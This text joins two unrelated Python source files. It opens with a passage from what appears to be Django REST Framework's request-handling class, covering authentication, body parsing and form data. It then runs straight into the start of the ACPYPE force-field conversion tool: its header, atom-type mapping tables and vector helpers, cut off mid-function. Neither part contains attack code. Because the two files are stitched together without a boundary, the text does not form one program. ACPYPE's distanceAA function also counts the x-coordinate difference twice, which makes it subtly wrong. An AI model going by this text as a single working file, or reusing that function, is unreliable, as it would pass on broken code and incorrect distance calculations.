self._load_data_and_files() return self._full_data @property def user(self): """ Returns the user associated with the current request, as authenticated by the authentication classes provided to the request. """ if not hasattr(self, '_user'): with wrap_attributeerrors(): self._authenticate() return self._user @user.setter def user(self, value): """ Sets the user on the current request. This is necessary to maintain compatibility with django.contrib.auth where the user property is set in the login and logout functions. Note that we also set the user on Django's underlying `HttpRequest` instance, ensuring that it is available to any middleware in the stack. """ self._user = value self._request.user = value @property def auth(self): """ Returns any non-user authentication information associated with the request, such as an authentication token. """ if not hasattr(self, '_auth'): with wrap_attributeerrors(): self._authenticate() return self._auth @auth.setter def auth(self, value): """ Sets any non-user authentication information associated with the request, such as an authentication token. """ self._auth = value self._request.auth = value @property def successful_authenticator(self): """ Return the instance of the authentication instance class that was used to authenticate the request, or `None`. """ if not hasattr(self, '_authenticator'): with wrap_attributeerrors(): self._authenticate() return self._authenticator def _load_data_and_files(self): """ Parses the request content into `self.data`. """ if not _hasattr(self, '_data'): self._data, self._files = self._parse() if self._files: self._full_data = self._data.copy() self._full_data.update(self._files) else: self._full_data = self._data # if a form media type, copy data & files refs to the underlying # http request so that closable objects are handled appropriately. if is_form_media_type(self.content_type): self._request._post = self.POST self._request._files = self.FILES def _load_stream(self): """ Return the content body of the request, as a stream. """ meta = self._request.META try: content_length = int( meta.get('CONTENT_LENGTH', meta.get('HTTP_CONTENT_LENGTH', 0)) ) except (ValueError, TypeError): content_length = 0 if content_length == 0: self._stream = None elif not self._request._read_started: self._stream = self._request else: self._stream = io.BytesIO(self.body) def _supports_form_parsing(self): """ Return True if this requests supports parsing form data. """ form_media = ( 'application/x-www-form-urlencoded', 'multipart/form-data' ) return any([parser.media_type in form_media for parser in self.parsers]) def _parse(self): """ Parse the request content, returning a two-tuple of (data, files) May raise an `UnsupportedMediaType`, or `ParseError` exception. """ media_type = self.content_type try: stream = self.stream except RawPostDataException: if not hasattr(self._request, '_post'): raise # If request.POST has been accessed in middleware, and a method='POST' # request was made with 'multipart/form-data', then the request stream # will already have been exhausted. if self._supports_form_parsing(): return (self._request.POST, self._request.FILES) stream = None if stream is None or media_type is None: if media_type and is_form_media_type(media_type): empty_data = QueryDict('', encoding=self._request._encoding) else: empty_data = {} empty_files = MultiValueDict() return (empty_data, empty_files) parser = self.negotiator.select_parser(self, self.parsers) if not parser: raise exceptions.UnsupportedMediaType(media_type) try: parsed = parser.parse(stream, media_type, self.parser_context) except Exception: # If we get an exception during parsing, fill in empty data and # re-raise. Ensures we don't simply repeat the error when # attempting to render the browsable renderer response, or when # logging the request or similar. self._data = QueryDict('', encoding=self._request._encoding) self._files = MultiValueDict() self._full_data = self._data raise # Parser classes may return the raw data, or a # DataAndFiles object. Unpack the result as required. try: return (parsed.data, parsed.files) except AttributeError: empty_files = MultiValueDict() return (parsed, empty_files) def _authenticate(self): """ Attempt to authenticate the request using each authentication instance in turn. """ for authenticator in self.authenticators: try: user_auth_tuple = authenticator.authenticate(self) except exceptions.APIException: self._not_authenticated() raise if user_auth_tuple is not None: self._authenticator = authenticator self.user, self.auth = user_auth_tuple return self._not_authenticated() def _not_authenticated(self): """ Set authenticator, user & authtoken representing an unauthenticated request. Defaults are None, AnonymousUser & None. """ self._authenticator = None if api_settings.UNAUTHENTICATED_USER: self.user = api_settings.UNAUTHENTICATED_USER() else: self.user = None if api_settings.UNAUTHENTICATED_TOKEN: self.auth = api_settings.UNAUTHENTICATED_TOKEN() else: self.auth = None def __getattr__(self, attr): """ If an attribute does not exist on this instance, then we also attempt to proxy it to the underlying HttpRequest object. """ try: return getattr(self._request, attr) except AttributeError: return self.__getattribute__(attr) @property def DATA(self): raise NotImplementedError( '`request.DATA` has been deprecated in favor of `request.data` ' 'since version 3.0, and has been fully removed as of version 3.2.' ) @property def POST(self): # Ensure that request.POST uses our request parsing. if not _hasattr(self, '_data'): self._load_data_and_files() if is_form_media_type(self.content_type): return self._data return QueryDict('', encoding=self._request._encoding) @property def FILES(self): # Leave this one alone for backwards compat with Django's request.FILES # Different from the other two cases, which are not valid property # names on the WSGIRequest class. if not _hasattr(self, '_files'): self._load_data_and_files() return self._files @property def QUERY_PARAMS(self): raise NotImplementedError( '`request.QUERY_PARAMS` has been deprecated in favor of `request.query_params` ' 'since version 3.0, and has been fully removed as of version 3.2.' ) def force_plaintext_errors(self, value): # Hack to allow our exception handler to force choice of # plaintext or html error responses. self._request.is_ajax = lambda: value
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Requirements: Python 3.6 or higher Antechamber (from AmberTools preferably) OpenBabel (optional, but strongly recommended) This code is released under GNU General Public License V3. <<< NO WARRANTY AT ALL!!! >>> It was inspired by: - amb2gmx.pl (Eric Sorin, David Mobley and John Chodera) and depends on Antechamber and Openbabel - YASARA Autosmiles: http://www.yasara.org/autosmiles.htm (Elmar Krieger) - topolbuild (Bruce Ray) - xplo2d (G.J. Kleywegt) For Non-uniform 1-4 scale factor conversion (e.g. if using GLYCAM06), please cite: BERNARDI, A., FALLER, R., REITH, D., and KIRSCHNER, K. N. ACPYPE update for nonuniform 1-4 scale factors: Conversion of the GLYCAM06 force field from AMBER to GROMACS. SoftwareX 10 (2019), 100241. doi: 10.1016/j.softx.2019.100241 For Antechamber, please cite: 1. WANG, J., WANG, W., KOLLMAN, P. A., and CASE, D. A. Automatic atom type and bond type perception in molecular mechanical calculations. Journal of Molecular Graphics and Modelling 25, 2 (2006), 247-260. doi: 10.1016/j.jmgm.2005.12.005 2. WANG, J., WOLF, R. M., CALDWELL, J. W., KOLLMAN, P. A., and CASE, D. A. Development and testing of a General Amber Force Field. Journal of Computational Chemistry 25, 9 (2004), 1157-1174. doi: 10.1002/jcc.20035 If you use this code, I am glad if you cite: SOUSA DA SILVA, A. W. & VRANKEN, W. F. ACPYPE - AnteChamber PYthon Parser interfacE. BMC Research Notes 5 (2012), 367 doi: 10.1186/1756-0500-5-367 http://www.biomedcentral.com/1756-0500/5/367 BATISTA, P. R.; WILTER, A.; DURHAM, E. H. A. B. & PASCUTTI, P. G. Molecular Dynamics Simulations Applied to the Study of Subtypes of HIV-1 Protease. Cell Biochemistry and Biophysics 44 (2006), 395-404. doi: 10.1385/CBB:44:3:395 Alan Wilter Sousa da Silva, D.Sc. Bioinformatician, UniProt, EMBL-EBI Hinxton, Cambridge CB10 1SD, UK. >>http://www.ebi.ac.uk/~awilter<< alanwilter _at_ gmail _dot_ com """ import traceback import signal import time import argparse import math import os import pickle import sys import subprocess as sub import re import abc import array # to pacify PyLint from datetime import datetime from shutil import copy2, rmtree, which import sysconfig MAXTIME = 3 * 3600 # For pip package if which("antechamber") is None: LOCAL_PATH = sysconfig.get_paths()["purelib"] if sys.platform == "linux": os.environ["PATH"] += ( os.pathsep + LOCAL_PATH + "amber19-0_linux/bin/to_be_dispatched:" + LOCAL_PATH + "/amber19-0_linux/bin:" + LOCAL_PATH + "/amber19-0_linux/dat/" ) os.environ["AMBERHOME"] = LOCAL_PATH + "/amber19-0_linux/" os.environ["ACHOME"] = LOCAL_PATH + "/amber19-0_linux/bin/" os.environ["LD_LIBRARY_PATH"] = LOCAL_PATH + "/amber19-0_linux/lib/" elif sys.platform == "darwin": os.environ["PATH"] += ( os.pathsep + LOCAL_PATH + "amber19-0_os/bin/to_be_dispatched:" + LOCAL_PATH + "/amber19-0_os/bin:" + LOCAL_PATH + "/amber19-0_os/dat/" ) os.environ["AMBERHOME"] = LOCAL_PATH + "/amber19-0_os/" os.environ["ACHOME"] = LOCAL_PATH + "/amber19-0_os/bin/" os.environ["LD_LIBRARY_PATH"] = LOCAL_PATH + "/amber19-0_os/lib/" if sys.version_info < (3, 6): print("ERROR: Sorry, you need python 3.6 or higher") sys.exit(5) year = datetime.today().year __updated__ = "2021-02-05T22:15:50CET" # tag = "2019-09-26T19:44:00UTC" tag = __updated__ lineHeader = """ | ACPYPE: AnteChamber PYthon Parser interfacE v. %s (c) %s AWSdS | """ % ( tag, year, ) frameLine = (len(lineHeader) - 2) * "=" header = "%s%s%s" % (frameLine, lineHeader, frameLine) # TODO: # Howto Charmm and Amber with NAMD # Howto build topology for a modified amino acid # CYANA topology files # List of Topology Formats created by acpype so far: outTopols = ["gmx", "cns", "charmm"] qDict = {"mopac": 0, "divcon": 1, "sqm": 2} # Residues that are not solute, to be avoided when balancing charges in # amb2gmx mode ionOrSolResNameList = ["Cl-", "Na+", "K+", "CIO", "Cs+", "IB", "Li+", "MG2", "Rb+", "WAT", "MOH", "NMA"] # leapAmberFile = 'leaprc.ff99SB' # 'leaprc.ff10' and 'leaprc.ff99bsc0' has extra Atom Types not in parm99.dat leapAmberFile = "leaprc.protein.ff14SB" # 'leaprc.ff14SB' # "qm_theory='AM1', grms_tol=0.0002, maxcyc=999, tight_p_conv=1, scfconv=1.d-10," # "AM1 ANALYT MMOK GEO-OK PRECISE" cal = 4.184 Pi = 3.141593 qConv = 18.2223 radPi = 57.295780 # 180/Pi maxDist = 3.0 minDist = 0.5 maxDist2 = maxDist ** 2 # squared Ang. minDist2 = minDist ** 2 # squared Ang. diffTol = 0.01 dictAmbAtomType2AmbGmxCode = { "BR": "1", "C": "2", "CA": "3", "CB": "4", "CC": "5", "CK": "6", "CM": "7", "CN": "8", "CQ": "9", "CR": "10", "CT": "11", "CV": "12", "CW": "13", "C*": "14", "Ca": "15", "F": "16", "H": "17", "HC": "18", "H1": "19", "H2": "20", "H3": "21", "HA": "22", "H4": "23", "H5": "24", "HO": "25", "HS": "26", "HW": "27", "HP": "28", "I": "29", "Cl": "30", "Na": "31", "IB": "32", "Mg": "33", "N": "34", "NA": "35", "NB": "36", "NC": "37", "N2": "38", "N3": "39", "N*": "40", "O": "41", "OW": "42", "OH": "43", "OS": "44", "O2": "45", "P": "46", "S": "47", "SH": "48", "CU": "49", "FE": "50", "K": "51", "Rb": "52", "Cs": "53", "Li": "56", "Zn": "57", "Sr": "58", "Ba": "59", "MCH3A": "MCH3A", "MCH3B": "MCH3B", "MNH2": "MNH2", "MNH3": "MNH3", "MW": "MW", } dictOplsAtomType2OplsGmxCode = { "Ac3+": ["697"], "Am3+": ["699"], "Ar": ["Ar", "097"], "Ba2+": ["414"], "Br": ["722", "730"], "Br-": ["402"], "CT": [ "064", "076", "122", "135", "136", "137", "138", "139", "148", "149", "152", "157", "158", "159", "161", "173", "174", "175", "181", "182", "183", "184", "206", "207", "208", "209", "210", "211", "212", "213", "214", "215", "216", "217", "218", "219", "220", "223", "224", "225", "229", "230", "242", "243", "244", "256", "257", "258", "259", "273", "274", "275", "276", "291", "292", "293", "294", "297", "305", "306", "307", "308", "331", "371", "373", "375", "391", "396", "421", "431", "443", "448", "453", "455", "458", "461", "468", "476", "482", "484", "486", "490", "491", "492", "498", "499", "505", "515", "516", "645", "670", "671", "672", "673", "674", "675", "676", "677", "678", "679", "680", "681", "701", "725", "747", "748", "755", "756", "757", "758", "762", "764", "765", "766", "774", "775", "776", "782", "783", "903", "904", "905", "906", "907", "908", "912", "913", "914", "915", "942", "943", "944", "945", "951", "957", "959", "960", "961", "962", "963", "964", ], "CA": [ "053", "145", "147", "166", "199", "221", "228", "260", "263", "266", "302", "312", "315", "317", "336", "351", "362", "380", "457", "460", "463", "472", "488", "521", "522", "523", "528", "532", "533", "538", "539", "551", "582", "590", "591", "592", "593", "604", "605", "606", "607", "608", "609", "610", "611", "612", "625", "644", "647", "648", "649", "650", "651", "652", "714", "716", "718", "720", "724", "727", "729", "731", "735", "736", "737", "738", "739", "742", "752", "768", "916", "917", "918", ], "C3": [ "007", "010", "036", "039", "063", "065", "067", "068", "069", "070", "080", "088", "090", "092", "096", "106", "107", "109", "126", "132", "415", "418", "425", "429", ], "C": [ "001", "017", "026", "058", "095", "131", "231", "234", "235", "247", "252", "267", "320", "322", "334", "366", "378", "470", "471", "772", "952", ], "C2": [ "005", "009", "015", "016", "019", "022", "027", "028", "031", "034", "037", "056", "057", "061", "071", "081", "089", "091", "093", "110", ], "CT_2": ["223B", "224B", "225B", "246", "283", "284", "285", "292B", "293B", "295", "298", "299", "906B", "912B"], "CM": ["141", "142", "143", "227", "323", "324", "337", "338", "381", "382", "517", "518", "708"], "CW": ["508", "514", "543", "552", "561", "567", "575", "583", "588", "637"], "CB": ["050", "349", "350", "364", "365", "501", "595", "623", "624"], "CH": ["006", "008", "014", "025", "029", "030", "060", "073"], "CZ": ["261", "423", "754", "925", "927", "928", "929", "931"], "CO": ["189", "191", "193", "195", "197", "198"], "C_2": ["232", "233", "277", "280", "465"], "CR": ["506", "509", "558", "572", "634"], "CQ": ["347", "531", "621", "642"], "CV": ["507", "560", "574", "636"], "CY": ["711", "712", "713", "733"], "CS": ["544", "568", "589"], "CK": ["353", "627"], "CN": ["502", "594"], "CP": ["043", "048"], "CU": ["550", "581"], "CT_3": ["245", "296"], "C=": ["150", "178"], "CD": ["011", "075"], "C4": ["066"], "C7": ["077"], "C8": ["074"], "C9": ["072"], "CX": ["510"], "C!": ["145B"], "C*": ["500"], "C+": ["700"], "C_3": ["271"], "CC": ["045"], "CF": ["044"], "CG": ["049"], "CT_4": ["160"], "Ca2+": ["412"], "Cl": ["123", "151", "226", "264"], "Cl-": ["401", "709"], "Cs+": ["410"], "Cu2+": ["Cu2+"], "Eu3+": ["705"], "F": ["164", "719", "721", "726", "728", "786", "956", "965"], "F-": ["400"], "Fe2+": ["Fe2+"], "Gd3+": ["706"], "HA": [ "146", "316", "318", "389", "524", "525", "526", "529", "534", "535", "536", "540", "541", "546", "547", "554", "555", "556", "563", "564", "565", "569", "570", "576", "577", "578", "584", "585", "586", "597", "598", "599", "600", "601", "602", "613", "614", "615", "616", "617", "618", "619", "629", "630", "631", "638", "639", "640", "643", "653", "654", "655", "656", "715", "717", "740", "741", "746", ], "HC": [ "140", "144", "153", "156", "165", "176", "185", "190", "192", "194", "196", "255", "279", "282", "329", "330", "332", "344", "372", "374", "376", "392", "416", "419", "422", "426", "430", "432", "444", "449", "454", "456", "459", "462", "469", "477", "483", "485", "487", "702", "710", "759", "763", "777", "778", "779", "784", "911", "926", "930", "950", "958", ], "H": [ "004", "013", "041", "047", "128", "240", "241", "250", "254", "314", "325", "327", "339", "342", "343", "357", "358", "360", "367", "369", "383", "385", "387", "388", "428", "479", "481", "504", "513", "545", "553", "562", "596", "632", "744", "745", "909", "910", ], "H3": ["021", "052", "055", "104", "105", "289", "290", "301", "304", "310", "941", "955"], "HO": ["024", "079", "155", "163", "168", "170", "172", "188", "270", "435"], "HS": ["033", "086", "087", "204", "205"], "HW": ["112", "114", "117", "119", "796"], "H4": ["345", "390"], "H5": ["355", "359"], "He": ["130"], "I": ["732"], "I-": ["403"], "K+": ["408"], "Kr": ["098"], "LP": ["433", "797"], "La3+": ["703"], "Li+": ["404", "406"], "MCH3A": ["MCH3A"], "MCH3B": ["MCH3B"], "MNH2": ["MNH2"], "MNH3": ["MNH3"], "MW": ["MW", "115"], "Mg2+": ["411"], "NA": [ "040", "046", "319", "321", "333", "354", "361", "377", "379", "503", "512", "542", "548", "557", "587", "628", ], "NC": ["311", "335", "346", "348", "363", "520", "527", "530", "537", "603", "620", "622", "641", "646"], "N": ["003", "012", "094", "237", "238", "239", "249", "251", "265", "478", "480", "787"], "N3": ["020", "101", "102", "103", "286", "287", "288", "309", "427", "940", "953"], "N2": ["051", "054", "300", "303", "313", "341", "356", "368", "386", "743"], "NB": ["042", "352", "511", "549", "559", "573", "580", "626", "635"], "N*": ["319B", "333B", "354B", "377B"], "NT": ["127", "900", "901", "902"], "NZ": ["262", "424", "750", "753"], "NO": ["760", "767"], "NY": ["749", "751"], "Na+": ["405", "407"], "Nd3+": ["704"], "Ne": ["129"], "OS": ["062", "108", "179", "180", "186", "395", "442", "447", "452", "467", "473", "566", "571", "579", "773"], "O": ["002", "059", "236", "248", "253", "326", "328", "340", "370", "384", "771", "788"], "OH": ["023", "078", "154", "162", "167", "169", "171", "187", "268", "420", "434"], "O2": ["018", "125", "272", "394", "441", "446", "451", "954"], "OW": ["111", "113", "116", "118", "795"], "O_2": ["278", "281", "466"], "OY": ["475", "494", "497"], "OL": ["120"], "ON": ["761"], "OU": ["437"], "O_3": ["269"], "P": ["393", "440", "445", "450", "785"], "P+": ["781"], "Rb+": ["409"], "S": ["035", "038", "084", "085", "124", "202", "203", "222", "633"], "SH": ["032", "082", "083", "200", "201", "417", "734"], "SI": ["SI"], "SY": ["474"], "SY2": ["493"], "SZ": ["496"], "Sr2+": ["413"], "Th4+": ["698"], "U": ["436"], "Xe": ["099"], "Yb3+": ["707"], "Zn2+": ["Zn2+"], } # reverse dictOplsAtomType2OplsGmxCode oplsCode2AtomTypeDict = {} for k, vv in list(dictOplsAtomType2OplsGmxCode.items()): for code in vv: oplsCode2AtomTypeDict[code] = k # if code in oplsCode2AtomTypeDict.keys(): # oplsCode2AtomTypeDict[code].append(k) # else: # oplsCode2AtomTypeDict[code] = [k] # Cross dictAmbAtomType2AmbGmxCode with dictOplsAtomType2OplsGmxCode & add H1,HP,H2 dictAtomTypeAmb2OplsGmxCode = {"H1": ["140", "1.00800"], "HP": ["140", "1.00800"], "H2": ["140", "1.00800"]} dictOplsMass = { "SY2": ["32.06000"], "Zn2+": ["65.37000"], "CQ": ["12.01100"], "CP": ["12.01100"], "Nd3+": ["144.24000"], "Br-": ["79.90400"], "Cu2+": ["63.54600"], "Br": ["79.90400"], "H": ["1.00800"], "P": ["30.97376"], "Sr2+": ["87.62000"], "ON": ["15.99940"], "OL": ["0.00000"], "OH": ["15.99940"], "OY": ["15.99940"], "OW": ["15.99940"], "OU": ["15.99940"], "OS": ["15.99940"], "Am3+": ["243.06000"], "HS": ["1.00800"], "HW": ["1.00800"], "HO": ["1.00800"], "HC": ["1.00800"], "HA": ["1.00800"], "O2": ["15.99940"], "Ca2+": ["40.08000"], "Th4+": ["232.04000"], "He": ["4.00260"], "C": ["12.01100"], "Cs+": ["132.90540"], "O": ["15.99940"], "Gd3+": ["157.25000"], "S": ["32.06000"], "P+": ["30.97376"], "La3+": ["138.91000"], "H3": ["1.00800"], "H4": ["1.00800"], "MNH2": ["0.00000"], "MW": ["0.00000"], "NB": ["14.00670"], "K+": ["39.09830"], "Ne": ["20.17970"], "Rb+": ["85.46780"], "C+": ["12.01100"], "C*": ["12.01100"], "NO": ["14.00670"], "CT_4": ["12.01100"], "NA": ["14.00670"], "C!": ["12.01100"], "NC": ["14.00670"], "NZ": ["14.00670"], "CT_2": ["12.01100"], "CT_3": ["12.01100"], "NY": ["14.00670"], "C9": ["14.02700"], "C8": ["13.01900"], "C=": ["12.01100"], "Yb3+": ["173.04000"], "C3": ["15.03500", "12.01100"], "C2": ["14.02700"], "C7": ["12.01100"], "C4": ["16.04300"], "CK": ["12.01100"], "Cl-": ["35.45300"], "N*": ["14.00670"], "CH": ["13.01900"], "CO": ["12.01100"], "CN": ["12.01100"], "CM": ["12.01100"], "F": ["18.99840"], "CC": ["12.01100"], "CB": ["12.01100"], "CA": ["12.01100"], "CG": ["12.01100"], "CF": ["12.01100"], "N": ["14.00670"], "CZ": ["12.01100"], "CY": ["12.01100"], "CX": ["12.01100"], "Ac3+": ["227.03000"], "CS": ["12.01100"], "CR": ["12.01100"], "N2": ["14.00670"], "N3": ["14.00670"], "CW": ["12.01100"], "CV": ["12.01100"], "CU": ["12.01100"], "CT": ["12.01100"], "SZ": ["32.06000"], "SY": ["32.06000"], "Cl": ["35.45300"], "NT": ["14.00670"], "O_2": ["15.99940"], "Xe": ["131.29300"], "SI": ["28.08000"], "SH": ["32.06000"], "Eu3+": ["151.96000"], "F-": ["18.99840"], "MNH3": ["0.00000"], "H5": ["1.00800"], "C_3": ["12.01100"], "C_2": ["12.01100"], "I-": ["126.90450"], "LP": ["0.00000"], "I": ["126.90450"], "Na+": ["22.98977"], "Li+": ["6.94100"], "U": ["0.00000"], "MCH3A": ["0.00000"], "MCH3B": ["0.00000"], "CD": ["13.01900", "12.01100"], "O_3": ["15.99940"], "Kr": ["83.79800"], "Fe2+": ["55.84700"], "Ar": ["39.94800"], "Mg2+": ["24.30500"], "Ba2+": ["137.33000"], } for ambKey in dictAmbAtomType2AmbGmxCode: if ambKey in dictOplsAtomType2OplsGmxCode: dictAtomTypeAmb2OplsGmxCode[ambKey] = dictOplsAtomType2OplsGmxCode[ambKey] + list(dictOplsMass[ambKey]) # learnt from 22 residues test. dictAtomTypeAmb2OplsGmxCode = { "HS": ["204", "1.008"], "HP": ["140", "1.008"], "HO": ["155", "168", "1.008"], "HC": ["140", "1.008"], "HA": ["146", "1.008"], "O2": ["272", "15.9994"], "C*": ["500", "12.011"], "NA": ["503", "512", "14.0067"], "NB": ["511", "14.0067"], "CB": ["501", "12.011"], "C": ["235", "271", "12.011"], "CN": ["502", "12.011"], "CM": ["302", "12.011"], "CC": ["507", "508", "510", "12.011"], "H": ["240", "241", "290", "301", "304", "310", "504", "513", "1.008"], "CA": ["145", "166", "12.011"], "O": ["236", "15.9994"], "N": ["237", "238", "239", "14.0067"], "S": ["202", "32.06"], "CR": ["506", "509", "12.011"], "N2": ["300", "303", "14.0067"], "N3": ["287", "309", "14.0067"], "CW": ["508", "510", "514", "12.011"], "CV": ["507", "12.011"], "CT": [ "135", "136", "137", "149", "157", "158", "206", "209", "210", "223B", "224B", "245", "246", "274", "283", "284", "285", "292", "292B", "293B", "296", "307", "308", "505", "12.011", ], "OH": ["154", "167", "15.9994"], "H1": ["140", "1.008"], "H4": ["146", "1.008"], "H5": ["146", "1.008"], "SH": ["200", "32.06"], } # learnt from 22 residues test. dictAtomTypeGaff2OplsGmxCode = { "cc": ["500", "506", "507", "508", "514", "12.011"], "ca": ["145", "166", "501", "502", "12.011"], "h1": ["140", "1.008"], "h4": ["146", "1.008"], "h5": ["146", "1.008"], "cz": ["302", "12.011"], "c2": ["509", "510", "12.011"], "nh": ["300", "303", "14.0067"], "ha": ["146", "1.008"], "na": ["503", "512", "14.0067"], "nc": ["511", "14.0067"], "nd": ["511", "14.0067"], "hx": ["140", "1.008"], "hs": ["204", "1.008"], "hn": ["240", "241", "290", "301", "304", "310", "504", "513", "1.008"], "ho": ["155", "168", "1.008"], "c3": [ "135", "136", "137", "149", "157", "158", "206", "209", "210", "223B", "224B", "245", "246", "274", "283", "284", "285", "292", "292B", "293B", "296", "307", "308", "505", "12.011", ], "hc": ["140", "1.008"], "cd": ["500", "506", "507", "508", "514", "12.011"], "c": ["235", "271", "12.011"], "oh": ["154", "167", "15.9994"], "ss": ["202", "32.06"], "o": ["236", "272", "15.9994"], "n": ["237", "238", "239", "14.0067"], "sh": ["200", "32.06"], "n4": ["287", "309", "14.0067"], } # draft atomTypeAmber2oplsDict = { "HS": ["HS"], "HP": ["HC"], "HO": ["HO"], "HC": ["HC"], "HA": ["HA"], "O2": ["O2"], "C*": ["C*"], "NA": ["NA"], "NB": ["NB"], "CB": ["CB"], "CN": ["CN"], "CV": ["CV"], "CM": ["CA"], "CA": ["CA"], "CR": ["CR"], "OH": ["OH"], "H1": ["HC"], "H4": ["HA"], "N2": ["N2"], "N3": ["N3"], "H5": ["HA"], "SH": ["SH"], "N": ["N"], "S": ["S"], "O": ["O"], "C": ["C", "C_3"], "CW": ["CW", "CX"], "H": ["H", "H3"], "CC": ["CX", "CW", "CV"], "CT": ["CT", "CT_2", "CT_3"], } # draft a2oD = { "amber99_2": ["opls_235", "opls_271"], "amber99_3": ["opls_302", "opls_145"], "amber99_5": ["opls_507", "opls_508", "opls_510"], "amber99_11": [ "opls_209", "opls_158", "opls_283", "opls_223B", "opls_293B", "opls_284", "opls_292B", "opls_274", "opls_136", "opls_135", "opls_292", "opls_157", "opls_206", "opls_137", "opls_505", "opls_224B", "opls_307", "opls_308", "opls_210", "opls_149", ], "amber99_13": ["opls_514"], "amber99_14": ["opls_500"], "amber99_17": ["opls_504", "opls_241", "opls_240", "opls_290", "opls_301", "opls_310", "opls_304", "opls_513"], "amber99_18": ["opls_140"], "amber99_19": ["opls_140"], "amber99_22": ["opls_146"], "amber99_23": ["opls_146"], "amber99_25": ["opls_155"], "amber99_26": ["opls_204"], "amber99_28": ["opls_140"], "amber99_34": ["opls_238", "opls_239", "opls_237"], "amber99_35": ["opls_512", "opls_503"], "amber99_36": ["opls_511"], "amber99_38": ["opls_300", "opls_303"], "amber99_39": ["opls_309", "opls_287"], "amber99_41": ["opls_236"], "amber99_43": ["opls_154"], "amber99_45": ["opls_272"], "amber99_47": ["opls_202"], "amber99_48": ["opls_200"], } pid = 0 head = "%s created by acpype (v: " + tag + ") on %s\n" date = datetime.now().ctime() usage = """ acpype -i _file_ [-c _string_] [-n _int_] [-m _int_] [-a _string_] [-f] etc. or acpype -p _prmtop_ -x _inpcrd_ [-d]""" epilog = """ output: assuming 'root' is the basename of either the top input file, the 3-letter residue name or user defined (-b option) root_bcc_gaff.mol2: final mol2 file with 'bcc' charges and 'gaff' atom type root_AC.inpcrd : coord file for AMBER root_AC.prmtop : topology and parameter file for AMBER root_AC.lib : residue library file for AMBER root_AC.frcmod : modified force field parameters root_GMX.gro : coord file for GROMACS root_GMX.top : topology file for GROMACS root_GMX.itp : molecule unit topology and parameter file for GROMACS root_GMX_OPLS.itp : OPLS/AA mol unit topol & par file for GROMACS (experimental!) em.mdp, md.mdp : run parameters file for GROMACS root_NEW.pdb : final pdb file generated by ACPYPE root_CNS.top : topology file for CNS/XPLOR root_CNS.par : parameter file for CNS/XPLOR root_CNS.inp : run parameters file for CNS/XPLOR root_CHARMM.rtf : topology file for CHARMM root_CHARMM.prm : parameter file for CHARMM root_CHARMM.inp : run parameters file for CHARMM""" SLEAP_TEMPLATE = """ source %(leapAmberFile)s source %(leapGaffFile)s set default fastbld on #set default disulfide auto %(res)s = loadpdb %(baseOrg)s.pdb #check %(res)s saveamberparm %(res)s %(acBase)s.prmtop %(acBase)s.inpcrd saveoff %(res)s %(acBase)s.lib quit """ TLEAP_TEMPLATE = """ verbosity 1 source %(leapAmberFile)s source %(leapGaffFile)s mods = loadamberparams %(acBase)s.frcmod %(res)s = loadmol2 %(acMol2FileName)s check %(res)s saveamberparm %(res)s %(acBase)s.prmtop %(acBase)s.inpcrd saveoff %(res)s %(acBase)s.lib quit """ def dotproduct(aa, bb): """scalar product""" return sum((a * b) for a, b in zip(aa, bb)) def crosproduct(a, b): """cross product""" c = [a[1] * b[2] - a[2] * b[1], a[2] * b[0] - a[0] * b[2], a[0] * b[1] - a[1] * b[0]] return c def length(v): """distance between 2 vectors""" return math.sqrt(dotproduct(v, v)) def vec_sub(aa, bb): """vector A - B""" return [a - b for a, b in zip(aa, bb)] def imprDihAngle(a, b, c, d): """calculate improper dihedral angle""" ba = vec_sub(a, b) bc = vec_sub(c, b) cb = vec_sub(b, c) cd = vec_sub(d, c) n1 = crosproduct(ba, bc) n2 = crosproduct(cb, cd) angle = math.acos(dotproduct(n1, n2) / (length(n1) * length(n2))) * 180 / Pi cp = crosproduct(n1, n2) if dotproduct(cp, bc) < 0: angle = -1 * angle return angle def distanceAA(c1, c2): """Distance between two atoms""" # print c1, c2 dist2 = (c1[0] - c2[0]) ** 2 + (c1[1] - c2[1]) ** 2 + (c1[0] - c2[0]) ** 2 + (c1[2] - c2[2]) ** 2 # dist2 = math.sqrt(dist2) return dist2 def elapsedTime(seconds, add_s=False, separator=" "): """ Takes an amount of seconds and turns it into a human-readable amount of time. """ suffixes = ["y", "w", "d", "h", "m", "s"] # the formatted time string to be returned atime = [] # the pieces of time to iterate over (days, hours, minutes, etc) # - the first piece in each tuple is the suffix (d, h, w) # - the second piece is the length in seconds (a day is 60s * 60m * 24h) parts = [ (suffixes[0], 60 * 60 * 24 * 7 * 52), (suffixes[1], 60 * 60 * 24 * 7), (suffixes[2], 60 * 60 * 24), (suffixes[3], 60 * 60), (suffixes[4], 60), (suffixes[5], 1), ] # for each time piece, grab the value and remaining seconds, and add it to # the time string for suffix, alength in parts: value = seconds // alength if value > 0: seconds = seconds % alength atime.append("%s%s" % (str(value), (suffix, (suffix, suffix + "s")[value > 1])[add_s])) if seconds < 1: break return separator.join(atime) def splitBlock(dat): """split a amber parm dat file in blocks 0 = mass, 1 = extra + bond, 2 = angle, 3 = dihedral, 4 = improp, 5 = hbond 6 = equiv nbon, 7 = nbon, 8 = END, 9 = etc. """ dict_ = {} count = 0 for line in dat: line = line.rstrip() if count in dict_: dict_[count].append(line) else: dict_[count] = [line] if not line: count += 1 return dict_ def parseFrcmod(lista): """Parse FRCMOD file""" heads = ["MASS", "BOND", "ANGL", "DIHE", "IMPR", "HBON", "NONB"] dict_ = {} for line in lista[1:]: line = line.strip() if line[:4] in heads: ahead = line[:4] dict_[ahead] = [] dd = {} continue if line: key = line.replace(" -", "-").replace("- ", "-").split()[0] if key in dd: if not dd[key].count(line): dd[key].append(line) else: dd[key] = [line] dict_[ahead] = dd for kk in dict_: if not dict_[kk]: dict_.pop(kk) return dict_ def parmMerge(fdat1, fdat2, frcmod=False): """merge two amber parm dat/frcmod files and save in /tmp""" name1 = os.path.basename(fdat1).split(".dat")[0] if frcmod: name2 = os.path.basename(fdat2).split(".")[1] else: name2 = os.path.basename(fdat2).split(".dat")[0] mname = "/tmp/" + name1 + name2 + ".dat" mdatFile = open(mname, "w") mdat = ["merged %s %s" % (name1, name2)] # if os.path.exists(mname): return mname dat1 = splitBlock(open(fdat1).readlines()) if frcmod: dHeads = {"MASS": 0, "BOND": 1, "ANGL": 2, "DIHE": 3, "IMPR": 4, "HBON": 5, "NONB": 7} dat2 = parseFrcmod(open(fdat2).readlines()) # dict for kk in dat2: for parEntry in dat2[kk]: idFirst = None for line in dat1[dHeads[kk]][:]: if line: key = line.replace(" -", "-").replace("- ", "-").split()[0] if key == parEntry: if not idFirst: idFirst = dat1[dHeads[kk]].index(line) 